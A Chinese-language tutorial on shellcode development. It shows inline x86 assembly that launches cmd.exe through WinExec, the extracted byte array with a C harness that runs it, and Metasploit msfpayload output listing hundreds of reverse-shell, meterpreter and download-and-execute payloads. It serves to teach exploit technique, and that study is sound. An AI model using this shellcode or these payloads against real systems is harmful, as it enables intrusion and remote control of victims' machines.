二进制代码生成和测试
本文目的:
学习shellcode编程
什么是shellcode
shellcode由来:
1996年,Aleph One在Underground 发表著名论文 Smashing the Stack for Fun and Profit, 其中详细描述了Linux系统中栈的结构和如何利用基于堆栈的缓冲区溢出。在这篇具有划时代意义的论文中,Aleph One演示了如何向进程中植入一段用于获得shell的代码,并在论文中称这段被植入的进程的代码为shellcode。
后来人们干脆统一用shellcode这个专用术语来通称缓冲区溢出攻击中植入进程的代码。
简单的说,Shellcode是一段能够完成某种特定功能的二进制代码。具体完成什么任务是由攻击者决定的,可能是开启一个新的shell或者下载某个特定的程序也或者向攻击者返回一个shell等等。
因为shellcode将会直接操作寄存器和一些系统调用,所以对于shellcode的编写基本上是用高级语言编写一段程序然后编译,反汇编从而得到16进制的操作码,当然也可以直接写汇编然后从二进制文件中提取出16进制的操作码,其内容和长度经常受到很多苛刻限制,故开发和调试难度很高。
c语言shellcode开发
#include "stdafx.h"
int main(int argc, char* argv[])
{
__asm{
push ebp
mov ebp, ESP
xor edi, edi
push edi
sub esp,04
mov [ebp-08h],63h //c
mov [ebp-07h], 6Dh //m
mov [ebp-06h], 64h //d
mov [ebp-05h], 2eh //.
mov [ebp-04h], 65h //e
mov [ebp-03h], 78h //x
mov [ebp-02h], 65h //e
push 1
lea eax, [ebp-08h]
push eax //
mov edx, 0x751f3231 //winexec
call edx
leave
};
return 0;
}
使用汇编代码编写的WinExec(cmd.exe) 功能代码: 设置断点开始调试
鼠标右键,点击 Go To Disassembly
可以看到每条指令对应的机器码
将其复制到notepad++中,
开始提取里面的机器码,将其转换成十六进制形式。
测试生成的shellcode是否可用,代码如下:
#include "stdafx.h"
#include <stdio.h>
unsigned char WinExec[] =
"\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45"
"\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6"
"\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65\x6A\x01\x8D\x45\xF8\x50\xBA"
"\x31\x32\x1F\x75"
"\xFF\xD2\xC9";
int main(int argc, char **argv)
{
__asm
{
lea eax, WinExec
push eax
ret
}
return 0;
}
运行后,如下所示:
可以执行代码.
msf生成shellcode
测试已经安装msfpayload
root@bt:~# which msfpayload
/usr/local/bin/msfpayload
查看帮助信息
root@bt:~# msfpayload -h
Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>
OPTIONS:
-h Help banner
-l List available payloads
获得所有可以利用的payload,一共有310个可以使用的payload, 试用于不同系统,如弹出对话框,执行命令,反向连接等等
root@bt:~# msfpayload -l
Framework Payloads (310 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server on Android
android/shell/reverse_tcp Connect back stager, Spawn a piped command shell (sh)
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged)
bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
bsd/x86/shell/reverse_ipv6_tcp Connect back to the attacker over IPv6, Spawn a command shell (staged)
bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_bind_tcp_ipv6 Listen for a connection and spawn a command shell over IPv6
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6
bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWK
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_zsh
Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
often available, please be aware it isn't usually installed by default.
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
cmd/unix/reverse Creates an interactive shell through two inbound connections
cmd/unix/reverse_awk Creates an interactive shell via GNU AWK
cmd/unix/reverse_bash
Creates an interactive shell via bash's builtin /dev/tcp.
This will not work on most Debian-based Linux distributions
(including Ubuntu) because they compile bash without the
/dev/tcp feature.
cmd/unix/reverse_bash_telnet_ssl
Creates an interactive shell via mknod and telnet.
This method works on Debian and other systems compiled
without /dev/tcp support. This module uses the '-z'
option included on some systems to encrypt using SSL.
cmd/unix/reverse_netcat Creates an interactive shell via netcat
cmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat
cmd/unix/reverse_openssl Creates an interactive shell through two inbound connections
cmd/unix/reverse_perl Creates an interactive shell via perl
cmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL
cmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL
cmd/unix/reverse_python Connect back and create a command shell via Python
cmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.
cmd/unix/reverse_ruby Connect back and create a command shell via Ruby
cmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL
cmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
cmd/unix/reverse_zsh
Connect back and create a command shell via Zsh. Note: Although Zsh is often
available, please be aware it isn't usually installed by default.
cmd/windows/adduser
Create a new user and add them to local administration group.
Note: The specified password is checked for common complexity
requirements to prevent the target machine rejecting the user
for failing to meet policy requirements.
Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/windows/download_eval_vbs Downloads a file from an HTTP(S) URL and executes it as a vbs script.
Use it to stage a vbs encoded payload from a short command line.
cmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it
cmd/windows/reverse_perl Creates an interactive shell via perl
cmd/windows/reverse_ruby Connect back and create a command shell via Ruby
generic/custom Use custom string or file as payload. Set either PAYLOADFILE or
PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in Java
java/meterpreter/reverse_http Tunnel communication over HTTP, Run a meterpreter server in Java
java/meterpreter/reverse_https Tunnel communication over HTTPS, Run a meterpreter server in Java
java/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server in Java
java/shell/bind_tcp Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
java/shell/reverse_tcp Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
java/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/armle/adduser Create a new user with UID 0
linux/armle/exec Execute an arbitrary command
linux/armle/shell/bind_tcp Listen for a connection, dup2 socket in r12, then execve
linux/armle/shell/reverse_tcp Connect back to the attacker, dup2 socket in r12, then execve
linux/armle/shell_bind_tcp Connect to target and spawn a command shell
linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell
linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc/shell_find_port Spawn a shell on an established connection
linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc64/shell_find_port Spawn a shell on an established connection
linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x64/exec Execute an arbitrary command
linux/x64/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
linux/x64/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
linux/x64/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x64/shell_find_port Spawn a shell on an established connection
linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/adduser Create a new user with UID 0
linux/x86/chmod Runs chmod on specified file with specified mode
linux/x86/exec Execute an arbitrary command
linux/x86/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Staged meterpreter server
linux/x86/meterpreter/bind_nonx_tcp Listen for a connection, Staged meterpreter server
linux/x86/meterpreter/bind_tcp Listen for a connection, Staged meterpreter server
linux/x86/meterpreter/find_tag Use an established connection, Staged meterpreter server
linux/x86/meterpreter/reverse_ipv6_tcp Connect back to attacker over IPv6, Staged meterpreter server
linux/x86/meterpreter/reverse_nonx_tcp Connect back to the attacker, Staged meterpreter server
linux/x86/meterpreter/reverse_tcp Connect back to the attacker, Staged meterpreter server
linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor
linux/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged)
linux/x86/shell/bind_nonx_tcp Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
linux/x86/shell/reverse_ipv6_tcp Connect back to attacker over IPv6, Spawn a command shell (staged)
linux/x86/shell/reverse_nonx_tcp Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x86/shell_find_port Spawn a shell on an established connection
linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell
netware/shell/reverse_tcp Connect back to the attacker, Connect to the NetWare console (staged)
osx/armle/execute/bind_tcp Listen for a connection, Spawn a command shell (staged)
osx/armle/execute/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
osx/armle/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
osx/armle/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell
osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/armle/vibrate
Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.
Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.
osx/ppc/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
osx/ppc/shell/find_tag Use an established connection, Spawn a command shell (staged)
osx/ppc/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
osx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
osx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x64/dupandexecve/bind_tcp Listen, read length, read buffer, execute, dup2 socket in edi, then execve
osx/x64/dupandexecve/reverse_tcp Connect, read length, read buffer, execute, dup2 socket in edi, then execve
osx/x64/exec Execute an arbitrary command
osx/x64/say Say an arbitrary string outloud using Mac OS X text2speech
osx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port
osx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
osx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/bundleinject/bind_tcp Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
osx/x86/bundleinject/reverse_tcp Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
osx/x86/exec Execute an arbitrary command
osx/x86/isight/bind_tcp Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
osx/x86/isight/reverse_tcp Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
osx/x86/shell_bind_tcp Listen for a connection and spawn a command shell
osx/x86/shell_find_port Spawn a shell on an established connection
osx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/vforkshell/bind_tcp Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
osx/x86/vforkshell/reverse_tcp Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
osx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell
osx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell
php/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
php/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6
php/bind_php Listen for a connection and spawn a command shell via php
php/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)
php/download_exec Download an EXE from an HTTP URL and execute it
php/exec Execute a single system command
php/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in PHP
php/meterpreter/bind_tcp_ipv6 Listen for a connection over IPv6, Run a meterpreter server in PHP
php/meterpreter/reverse_tcp Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)
php/reverse_perl Creates an interactive shell via perl
php/reverse_php Reverse PHP connect back shell with checks for disabled functions
php/shell_findsock
Spawn a shell on the established connection to
the webserver. Unfortunately, this payload
can leave conspicuous evil-looking entries in the
apache error logs, so it is probably a good idea
to use a bind or reverse shell unless firewalls
prevent them from working. The issue this
payload takes advantage of (CLOEXEC flag not set
on sockets) appears to have been patched on the
Ubuntu version of Apache and may not work on
other Debian-based distributions. Only tested on
Apache but it might work on other web servers
that leak file descriptors to child processes.
python/shell_reverse_tcp_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.
ruby/shell_bind_tcp Continually listen for a connection and spawn a command shell via Ruby
ruby/shell_bind_tcp_ipv6 Continually listen for a connection and spawn a command shell via Ruby
ruby/shell_reverse_tcp Connect back and create a command shell via Ruby
ruby/shell_reverse_tcp_ssl Connect back and create a command shell via Ruby, uses SSL
solaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/sparc/shell_find_port Spawn a shell on an established connection
solaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
solaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/x86/shell_find_port Spawn a shell on an established connection
solaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
tty/unix/interact Interacts with a TTY on an established socket connection
windows/adduser
Create a new user and add them to local administration group.
Note: The specified password is checked for common complexity
requirements to prevent the target machine rejecting the user
for failing to meet policy requirements.
Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a DLL via a reflective loader
windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a DLL via a reflective loader
windows/dllinject/bind_tcp Listen for a connection, Inject a DLL via a reflective loader
windows/dllinject/bind_tcp_rc4 Listen for a connection, Inject a DLL via a reflective loader
windows/dllinject/find_tag Use an established connection, Inject a DLL via a reflective loader
windows/dllinject/reverse_http Tunnel communication over HTTP, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a DLL via a reflective loader
windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_rc4 Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_rc4_dns Connect back to the attacker, Inject a DLL via a reflective loader
windows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload
windows/download_exec Download an EXE from an HTTP(S)/FTP URL and execute it
windows/exec Execute an arbitrary command
windows/loadlibrary Load an arbitrary library path
windows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon
windows/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/bind_tcp_rc4 Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/find_tag Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_http Tunnel communication over HTTP, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_https Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_https_proxy Tunnel communication over HTTP using SSL with custom proxy support, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ipv6_https Tunnel communication over HTTP using SSL and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_rc4 Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_rc4_dns Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
windows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
windows/patchupdllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a custom DLL into the exploited process
windows/patchupdllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a custom DLL into the exploited process
windows/patchupdllinject/bind_tcp Listen for a connection, Inject a custom DLL into the exploited process
windows/patchupdllinject/bind_tcp_rc4 Listen for a connection, Inject a custom DLL into the exploited process
windows/patchupdllinject/find_tag Use an established connection, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_ord_tcp Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_dns Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_rc4 Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_rc4_dns Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupmeterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/bind_tcp_rc4 Listen for a connection, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/find_tag Use an established connection, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_rc4 Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_rc4_dns Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a piped command shell (staged)
windows/shell/bind_nonx_tcp Listen for a connection (No NX), Spawn a piped command shell (staged)
windows/shell/bind_tcp Listen for a connection, Spawn a piped command shell (staged)
windows/shell/bind_tcp_rc4 Listen for a connection, Spawn a piped command shell (staged)
windows/shell/find_tag Use an established connection, Spawn a piped command shell (staged)
windows/shell/reverse_http Tunnel communication over HTTP, Spawn a piped command shell (staged)
windows/shell/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Spawn a piped command shell (staged)
windows/shell/reverse_ipv6_tcp Connect back to the attacker over IPv6, Spawn a piped command shell (staged)
windows/shell/reverse_nonx_tcp Connect back to the attacker (No NX), Spawn a piped command shell (staged)
windows/shell/reverse_ord_tcp Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)
windows/shell/reverse_tcp_dns Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp_rc4 Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp_rc4_dns Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell_bind_tcp Listen for a connection and spawn a command shell
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell
windows/shell_reverse_tcp Connect back to attacker and spawn a command shell
windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API
windows/upexec/bind_ipv6_tcp Listen for a connection over IPv6, Uploads an executable and runs it (staged)
windows/upexec/bind_nonx_tcp Listen for a connection (No NX), Uploads an executable and runs it (staged)
windows/upexec/bind_tcp Listen for a connection, Uploads an executable and runs it (staged)
windows/upexec/bind_tcp_rc4 Listen for a connection, Uploads an executable and runs it (staged)
windows/upexec/find_tag Use an established connection, Uploads an executable and runs it (staged)
windows/upexec/reverse_http Tunnel communication over HTTP, Uploads an executable and runs it (staged)
windows/upexec/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Uploads an executable and runs it (staged)
windows/upexec/reverse_ipv6_tcp Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)
windows/upexec/reverse_nonx_tcp Connect back to the attacker (No NX), Uploads an executable and runs it (staged)
windows/upexec/reverse_ord_tcp Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_dns Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_rc4 Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_rc4_dns Connect back to the attacker, Uploads an executable and runs it (staged)
windows/vncinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/bind_nonx_tcp Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/bind_tcp Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/bind_tcp_rc4 Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/find_tag Use an established connection, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_http Tunnel communication over HTTP, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_ord_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_dns Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_rc4 Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_rc4_dns Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/x64/exec Execute an arbitrary command (Windows x64)
windows/x64/loadlibrary Load an arbitrary x64 library path
windows/x64/meterpreter/bind_tcp Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
windows/x64/meterpreter/reverse_https Tunnel communication over HTTP using SSL (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
windows/x64/meterpreter/reverse_tcp Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell/reverse_https Tunnel communication over HTTP using SSL (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell/reverse_tcp Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)
windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)
windows/x64/vncinject/bind_tcp Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
windows/x64/vncinject/reverse_https Tunnel communication over HTTP using SSL (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
windows/x64/vncinject/reverse_tcp Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
测试可以弹对话框的shellcode,对应payload windows/messagebox 查看详细配置使用S命令
root@bt:~# msfpayload windows/messagebox S
Name: Windows MessageBox
Module: payload/windows/messagebox
Version: 0
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 270
Rank: Normal
Provided by:
corelanc0d3r <peter.ve@corelan.be>
jduck <jduck@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
ICON NO yes Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION
TEXT Hello, from MSF! yes Messagebox Text (max 255 chars)
